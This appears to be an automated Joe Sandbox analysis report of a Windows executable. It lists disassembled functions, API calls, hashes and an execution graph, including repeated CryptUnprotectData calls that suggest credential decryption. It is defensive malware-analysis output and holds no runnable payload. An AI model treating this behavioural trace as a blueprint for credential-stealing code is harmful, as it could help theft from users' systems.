                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                            • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                            • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                            • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                            Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                            • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                            Function 00405DB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3677997916-1824292864
                                                                                                            • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                            • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                            • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                            • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                                            Function 00405935 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 0040593B
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00405945
                                                                                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-2145255484
                                                                                                            • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                            • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                            • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                            • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                            Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404258612-0
                                                                                                            • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                            • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                            Function 0040381F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,004037F6,774D3420,00403621,?), ref: 00403839
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-2145255484
                                                                                                            • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                            • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                            • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                            • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                            Function 00405981 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405987
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405997
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-3080008178
                                                                                                            • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                            • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                            • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                            • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                            Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                              • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloclstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 852173138-0
                                                                                                            • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                            • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                            • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                            • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                            Function 00405ABB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                            • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                            • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                            • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2%
                                                                                                            Total number of Nodes:307
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 43404 36452020 SetTimer 43405 3645208c 43404->43405 43406 364520c0 43409 364520ed 43406->43409 43407 3645213c 43407->43407 43409->43407 43410 364518ac 43409->43410 43411 364518b7 43410->43411 43416 36451874 43411->43416 43413 3645229c 43420 35f2962c 43413->43420 43414 364522a5 43414->43407 43417 3645187f 43416->43417 43424 364518cc 43417->43424 43419 364522f5 43419->43413 43421 35f29637 43420->43421 43423 35f2f04f 43421->43423 43428 35f2ebd4 43421->43428 43423->43414 43425 364518d7 43424->43425 43426 36452461 GetCurrentThreadId 43425->43426 43427 3645248b 43425->43427 43426->43427 43427->43419 43430 35f2ebdf 43428->43430 43429 35f2f119 43429->43423 43430->43429 43433 35f2fab8 43430->43433 43438 35f2faa8 43430->43438 43434 35f2fae3 43433->43434 43435 35f2fb92 43434->43435 43443 364500c0 43434->43443 43447 364500b0 43434->43447 43440 35f2fab8 43438->43440 43439 35f2fb92 43439->43439 43440->43439 43441 364500c0 2 API calls 43440->43441 43442 364500b0 2 API calls 43440->43442 43441->43439 43442->43439 43452 36450104 43443->43452 43456 36450110 43443->43456 43448 364500c0 43447->43448 43450 36450104 CreateWindowExW 43448->43450 43451 36450110 CreateWindowExW 43448->43451 43449 364500f5 43449->43435 43450->43449 43451->43449 43453 36450178 CreateWindowExW 43452->43453 43455 36450234 43453->43455 43457 36450178 CreateWindowExW 43456->43457 43459 36450234 43457->43459 43459->43459 43460 db168 43461 db174 43460->43461 43470 331e0198 43461->43470 43474 331e0188 43461->43474 43462 db1a3 43478 35f2bd48 43462->43478 43471 331e01a4 43470->43471 43494 331ec638 43471->43494 43472 331e01da 43472->43462 43475 331e01a4 43474->43475 43477 331ec638 CryptUnprotectData 43475->43477 43476 331e01da 43476->43462 43477->43476 43479 35f2bd54 43478->43479 43520 35f2bd98 43479->43520 43482 36452720 43483 36452730 43482->43483 43546 36450938 43483->43546 43488 36452730 43489 3645273f 43488->43489 43490 36450938 10 API calls 43489->43490 43491 36452746 43490->43491 43492 3645193c 16 API calls 43491->43492 43493 db1b1 43492->43493 43496 331ec631 43494->43496 43495 331ecaf9 43495->43472 43496->43494 43496->43495 43498 331ecf01 43496->43498 43499 331ecf10 43498->43499 43503 331ed550 43499->43503 43510 331ed540 43499->43510 43500 331ecf80 43500->43496 43504 331ed575 43503->43504 43507 331ed629 43503->43507 43504->43507 43508 331ed550 CryptUnprotectData 43504->43508 43509 331ed540 CryptUnprotectData 43504->43509 43517 331ed1ec 43507->43517 43508->43507 43509->43507 43511 331ed550 43510->43511 43512 331ed629 43511->43512 43515 331ed550 CryptUnprotectData 43511->43515 43516 331ed540 CryptUnprotectData 43511->43516 43513 331ed1ec CryptUnprotectData 43512->43513 43514 331ed7f5 43513->43514 43514->43500 43515->43512 43516->43512 43518 331ed9e0 CryptUnprotectData 43517->43518 43519 331ed7f5 43518->43519 43519->43500 43521 35f2bdb4 43520->43521 43525 35f2ce60 43521->43525 43529 35f2ce51 43521->43529 43522 db1aa 43522->43482 43522->43488 43526 35f2ce7c 43525->43526 43533 35f29544 43526->43533 43528 35f2ce9b 43528->43522 43530 35f2ce60 43529->43530 43531 35f29544 2 API calls 43530->43531 43532 35f2ce9b 43531->43532 43532->43522 43534 35f2954f 43533->43534 43535 35f2cf4f 43534->43535 43538 35f2d370 43534->43538 43542 35f2d360 43534->43542 43535->43528 43539 35f2d39e 43538->43539 43540 35f2d429 43539->43540 43541 35f2962c 2 API calls 43539->43541 43540->43540 43541->43540 43543 35f2d370 43542->43543 43544 35f2d429 43543->43544 43545 35f2962c 2 API calls 43543->43545 43544->43544 43545->43544 43547 36450948 43546->43547 43548 36450965 43547->43548 43555 36450971 43547->43555 43567 36450980 43547->43567 43551 3645193c 43548->43551 43552 36451947 43551->43552 43590 364519e4 43552->43590 43554 36452825 43554->43554 43556 36450980 GetCurrentProcess 43555->43556 43558 36450a18 GetCurrentThread 43556->43558 43560 36450a11 43556->43560 43559 36450a55 GetCurrentProcess 43558->43559 43562 36450a4e 43558->43562 43561 36450a8b 43559->43561 43560->43558 43579 36450f31 43561->43579 43581 36450b51 43561->43581 43562->43559 43563 36450ab3 GetCurrentThreadId 43564 36450ae4 43563->43564 43564->43548 43568 364509c6 GetCurrentProcess 43567->43568 43570 36450a11 43568->43570 43571 36450a18 GetCurrentThread 43568->43571 43570->43571 43572 36450a55 GetCurrentProcess 43571->43572 43573 36450a4e 43571->43573 43574 36450a8b 43572->43574 43573->43572 43577 36450f31 43574->43577 43578 36450b51 2 API calls 43574->43578 43575 36450ab3 GetCurrentThreadId 43576 36450ae4 43575->43576 43576->43548 43577->43575 43578->43575 43580 36450f4e 43579->43580 43580->43563 43585 36450bc8 DuplicateHandle 43581->43585 43587 36450bc1 43581->43587 43582 36450b8e 43582->43563 43586 36450c5e 43585->43586 43586->43582 43588 36450bc8 DuplicateHandle 43587->43588 43589 36450c5e 43588->43589 43589->43582 43596 364519ef 43590->43596 43591 36452e79 43592 36452ea9 43591->43592 43593 36452b7c 11 API calls 43591->43593 43597 36452ed4 43592->43597 43606 36452b7c 43592->43606 43593->43592 43595 36452ec1 43595->43597 43612 3645d6d8 43595->43612 43619 3645d6e8 43595->43619 43596->43591 43596->43597 43601 36454248 43596->43601 43597->43554 43602 36454269 43601->43602 43603 3645428d 43602->43603 43626 364543e9 43602->43626 43632 364543f8 43602->43632 43603->43591 43607 36452b87 43606->43607 43608 36450938 10 API calls 43607->43608 43611 3645d181 43607->43611 43609 3645d19b 43608->43609 43670 3645c5fc 43609->43670 43611->43595 43614 3645d74d 43612->43614 43613 3645d79a 43613->43597 43614->43613 43615 3645d979 43614->43615 43617 3645dbb0 WaitMessage 43614->43617 43677 3645c6c4 43614->43677 43616 36450938 10 API calls 43615->43616 43616->43613 43617->43614 43625 3645d74d 43619->43625 43620 3645d979 43621 36450938 10 API calls 43620->43621 43623 3645d79a 43621->43623 43622 3645dbb0 WaitMessage 43622->43625 43623->43597 43624 3645c6c4 DispatchMessageW 43624->43625 43625->43620 43625->43622 43625->43623 43625->43624 43628 364543f8 43626->43628 43627 36450938 10 API calls 43629 36454433 43627->43629 43628->43627 43630 3645443e 43629->43630 43638 364535a8 43629->43638 43630->43603 43636 36454405 43632->43636 43633 36450938 10 API calls 43634 36454433 43633->43634 43635 3645443e 43634->43635 43637 364535a8 12 API calls 43634->43637 43635->43603 43636->43633 43637->43635 43639 364535b3 43638->43639 43640 364544b0 43639->43640 43642 364535dc 43639->43642 43643 364535e7 43642->43643 43650 364535ec 43643->43650 43645 3645451f 43654 364593b4 43645->43654 43659 36459420 43645->43659 43665 36459412 43645->43665 43646 36454559 43646->43640 43653 364535f7 43650->43653 43651 364556c0 43651->43645 43652 36454248 12 API calls 43652->43651 43653->43651 43653->43652 43655 364593bf 43654->43655 43656 3645945d 43655->43656 43657 35f2fab8 2 API calls 43655->43657 43658 35f2faa8 2 API calls 43655->43658 43656->43646 43657->43656 43658->43656 43661 36459451 43659->43661 43662 36459551 43659->43662 43660 3645945d 43660->43646 43661->43660 43663 35f2fab8 2 API calls 43661->43663 43664 35f2faa8 2 API calls 43661->43664 43662->43646 43663->43662 43664->43662 43666 364593bf 43665->43666 43666->43665 43667 3645945d 43666->43667 43668 35f2fab8 2 API calls 43666->43668 43669 35f2faa8 2 API calls 43666->43669 43667->43646 43668->43667 43669->43667 43671 3645c607 43670->43671 43672 3645d49b 43671->43672 43674 3645c618 43671->43674 43672->43611 43675 3645d4d0 OleInitialize 43674->43675 43676 3645d534 43675->43676 43676->43672 43678 3645e7e8 DispatchMessageW 43677->43678 43679 3645e854 43678->43679 43679->43614 43680 